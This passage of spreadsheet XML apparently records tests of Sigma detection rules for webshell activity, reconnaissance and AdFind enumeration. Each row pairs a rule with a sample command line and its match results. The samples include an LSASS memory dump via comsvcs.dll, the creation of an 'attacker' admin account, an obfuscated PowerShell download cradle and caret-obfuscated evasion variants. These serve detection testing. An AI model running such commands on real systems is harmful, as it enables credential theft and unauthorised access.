          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1961" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1961" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1961" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1961" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [S]"</t>
        </is>
      </c>
      <c r="F1961" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1961" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1961" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1961" s="44" t="n"/>
      <c r="K1961" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1962" ht="15.75" customHeight="1" s="42">
      <c r="A1962" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1962" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1962" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1962" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1962" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp;&amp; echo [S]"</t>
        </is>
      </c>
      <c r="F1962" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1962" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1962" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1962" s="44" t="n"/>
      <c r="K1962" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1963" ht="15.75" customHeight="1" s="42">
      <c r="A1963" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1963" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1963" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1963" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1963" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami\n\recho [S]"</t>
        </is>
      </c>
      <c r="F1963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1963" s="44" t="n"/>
      <c r="J1963" s="44" t="n"/>
      <c r="K1963" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1964" ht="15.75" customHeight="1" s="42">
      <c r="A1964" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1964" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1964" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1964" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1964" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "^w^h^o^a^m^i&amp;echo [S]"</t>
        </is>
      </c>
      <c r="F1964" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1964" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1964" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1964" s="44" t="n"/>
      <c r="K1964" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1965" ht="15.75" customHeight="1" s="42">
      <c r="A1965" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1965" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1965" s="44" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1965" s="44" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1965" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami | clip &amp; echo [S]"</t>
        </is>
      </c>
      <c r="F1965" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1965" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1965" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1965" s="44" t="n"/>
      <c r="K1965" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1966" ht="15.75" customHeight="1" s="42">
      <c r="A1966" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1966" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1966" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1966" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1966" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\System32"comsvcs".dll,MiniDump 624 C:\temp\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1966" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1966" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1966" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL (646ea171-dded-4578-8a4d-65e9822892e3); Process Memory Dump Via Comsvcs.DLL (646ea171-dded-4578-8a4d-65e9822892e3); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J1966" s="44" t="n"/>
      <c r="K1966" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1967" ht="15.75" customHeight="1" s="42">
      <c r="A1967" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1967" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1967" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1967" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1967" s="44" t="inlineStr">
        <is>
          <t>rar.exe a -m5  -hpSecure123 C:\backup.rar C:\data\</t>
        </is>
      </c>
      <c r="F1967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1967" s="44" t="n"/>
      <c r="J1967" s="44" t="n"/>
      <c r="K1967" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1968" ht="15.75" customHeight="1" s="42">
      <c r="A1968" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1968" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1968" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1968" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1968" s="44" t="inlineStr">
        <is>
          <t>net.exe user attacker Pass1234 /add</t>
        </is>
      </c>
      <c r="F1968" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1968" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1968" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1968" s="44" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J1968" s="44" t="n"/>
      <c r="K1968" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1969" ht="15.75" customHeight="1" s="42">
      <c r="A1969" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1969" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1969" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1969" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1969" s="44" t="inlineStr">
        <is>
          <t>net1 localgroup administrators attacker /add</t>
        </is>
      </c>
      <c r="F1969" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1969" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1969" s="44" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group (ad720b90-25ad-43ff-9b5e-5c841facc8e5); User Added to Local Administrators Group (ad720b90-25ad-43ff-9b5e-5c841facc8e5)</t>
        </is>
      </c>
      <c r="J1969" s="44" t="n"/>
      <c r="K1969" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1970" ht="15.75" customHeight="1" s="42">
      <c r="A1970" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1970" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1970" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1970" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1970" s="44" t="inlineStr">
        <is>
          <t>net.exe  user</t>
        </is>
      </c>
      <c r="F1970" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1970" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1970" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1970" s="44" t="n"/>
      <c r="K1970" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1971" ht="15.75" customHeight="1" s="42">
      <c r="A1971" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1971" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1971" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1971" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1971" s="44" t="inlineStr">
        <is>
          <t>net.exe "user"</t>
        </is>
      </c>
      <c r="F1971" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1971" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1971" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1971" s="44" t="n"/>
      <c r="K1971" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1972" ht="15.75" customHeight="1" s="42">
      <c r="A1972" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1972" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1972" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1972" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1972" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /node="127.0.0.1" process list</t>
        </is>
      </c>
      <c r="F1972" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1972" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1972" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1972" s="44" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J1972" s="44" t="n"/>
      <c r="K1972" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1973" ht="15.75" customHeight="1" s="42">
      <c r="A1973" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1973" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1973" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1973" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1973" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -e bmV3LW9iamVjdCAtY29tIG9iamVjdCBzY3JpcHRpbmcuZmlsZXN5c3RlbW9iamVjdA==</t>
        </is>
      </c>
      <c r="F1973" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1973" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1973" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1973" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1973" s="44" t="n"/>
      <c r="K1973" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1974" ht="15.75" customHeight="1" s="42">
      <c r="A1974" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1974" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1974" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1974" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1974" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$w = New-Object System.Net.WebClient; $w.((('Down'+'load')+'String')).Invoke('[http://127.0.0.1/s.ps1](https://www.google.com/search?q=http://127.0.0.1/s.ps1)')"</t>
        </is>
      </c>
      <c r="F1974" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1974" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1974" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1974" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1974" s="44" t="n"/>
      <c r="K1974" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1975" ht="15.75" customHeight="1" s="42">
      <c r="A1975" s="44" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1975" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1975" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1975" s="44" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1975" s="44" t="inlineStr">
        <is>
          <t>net view \\localhost</t>
        </is>
      </c>
      <c r="F1975" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1975" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1975" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1975" s="44" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165)</t>
        </is>
      </c>
      <c r="J1975" s="44" t="n"/>
      <c r="K1975" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1976" ht="15.75" customHeight="1" s="42">
      <c r="A1976" s="44" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1976" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1976" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1976" s="44" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1976" s="44" t="inlineStr">
        <is>
          <t>net "view"</t>
        </is>
      </c>
      <c r="F1976" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1976" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1976" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1976" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03); Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J1976" s="44" t="n"/>
      <c r="K1976" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1977" ht="15.75" customHeight="1" s="42">
      <c r="A1977" s="44" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1977" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1977" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1977" s="44" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1977" s="44" t="inlineStr">
        <is>
          <t>net.exe ViEw /all</t>
        </is>
      </c>
      <c r="F1977" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1977" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1977" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1977" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J1977" s="44" t="n"/>
      <c r="K1977" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1978" ht="15.75" customHeight="1" s="42">
      <c r="A1978" s="44" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1978" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1978" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1978" s="44" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1978" s="44" t="inlineStr">
        <is>
          <t>net	view</t>
        </is>
      </c>
      <c r="F1978" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1978" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1978" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1978" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J1978" s="44" t="n"/>
      <c r="K1978" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1979" ht="15.75" customHeight="1" s="42">
      <c r="A1979" s="44" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1979" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1979" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1979" s="44" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1979" s="44" t="inlineStr">
        <is>
          <t>net1.exe view</t>
        </is>
      </c>
      <c r="F1979" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1979" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1979" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1979" s="44" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J1979" s="44" t="n"/>
      <c r="K1979" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1980" ht="15.75" customHeight="1" s="42">
      <c r="A1980" s="44" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1980" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_adfind</t>
        </is>
      </c>
      <c r="C1980" s="44" t="inlineStr">
        <is>
          <t>Renamed AdFind Execution</t>
        </is>
      </c>
      <c r="D1980" s="44" t="inlineStr">
        <is>
          <t>df55196f-f105-44d3-a675-e9dfb6cc2f2b</t>
        </is>
      </c>
      <c r="E1980" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\ExternalPayloads\adfind_test.exe" -gcb -sc tru"st"dmp</t>
        </is>
      </c>
      <c r="F1980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1980" s="44" t="n"/>
      <c r="J1980" s="44" t="n"/>
      <c r="K1980" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1981" ht="15.75" customHeight="1" s="42">
      <c r="A1981" s="44" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1981" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_adfind</t>
        </is>
      </c>
      <c r="C1981" s="44" t="inlineStr">
        <is>
          <t>Renamed AdFind Execution</t>
        </is>
      </c>
      <c r="D1981" s="44" t="inlineStr">
        <is>
          <t>df55196f-f105-44d3-a675-e9dfb6cc2f2b</t>
        </is>
      </c>
      <c r="E1981" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set "ARG=objectcategory=" &amp;&amp; call C:\ExternalPayloads\adfind_test.exe -f (%ARG%computer)"</t>
        </is>
      </c>
      <c r="F1981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1981" s="44" t="n"/>
      <c r="J1981" s="44" t="n"/>
      <c r="K1981" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1982" ht="15.75" customHeight="1" s="42">
      <c r="A1982" s="44" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1982" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C1982" s="44" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1982" s="44" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E1982" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall show rule name= all</t>
        </is>
      </c>
      <c r="F1982" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1982" s="44" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE (0e4164da-94bc-450d-a7be-a4b176179f1f)</t>
        </is>
      </c>
      <c r="J1982" s="44" t="n"/>
      <c r="K1982" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1983" ht="15.75" customHeight="1" s="42">
      <c r="A1983" s="44" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1983" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1983" s="44" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1983" s="44" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1983" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set ATTR=workstation&amp;&amp; call net config %ATTR%"</t>
        </is>
      </c>
      <c r="F1983" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1983" s="44" t="inlineStr">
        <is>
          <t>Suspicious Network Command (a29c1813-ab1f-4dde-b489-330b952e91ae)</t>
        </is>
      </c>
      <c r="J1983" s="44" t="n"/>
      <c r="K1983" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1984" ht="15.75" customHeight="1" s="42">
      <c r="A1984" s="44" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1984" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1984" s="44" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1984" s="44" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1984" s="44" t="inlineStr">
        <is>
          <t>C:\\AtomicRedTeam\\atomics\\..\\ExternalPayloads\\AdFind.exe -sc "admincountdmp"</t>
        </is>
      </c>
      <c r="F1984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1984" s="44" t="n"/>
      <c r="J1984" s="44" t="n"/>
      <c r="K1984" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1985" ht="15.75" customHeight="1" s="42">
      <c r="A1985" s="44" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1985" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1985" s="44" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1985" s="44" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1985" s="44" t="inlineStr">
        <is>
          <t>C:\\AtomicRedTeam\\atomics\\..\\ExternalPayloads\\AdFind.exe -gcb -sc "exchaddresses"</t>
        </is>
      </c>
      <c r="F1985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1985" s="44" t="n"/>
      <c r="J1985" s="44" t="n"/>
      <c r="K1985" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1986" ht="15.75" customHeight="1" s="42">
      <c r="A1986" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1986" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_port_scanner</t>
        </is>
      </c>
      <c r="C1986" s="44" t="inlineStr">
        <is>
          <t>PUA - Advanced Port Scanner Execution</t>
        </is>
      </c>
      <c r="D1986" s="44" t="inlineStr">
        <is>
          <t>54773c5f-f1cc-4703-9126-2f797d96a69d</t>
        </is>
      </c>
      <c r="E1986" s="44" t="inlineStr">
        <is>
          <t>advanced_port_scanner.exe /portable /lng</t>
        </is>
      </c>
      <c r="F1986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1986" s="44" t="n"/>
      <c r="J1986" s="44" t="n"/>
      <c r="K1986" s="44" t="b">
        <v>0</v>
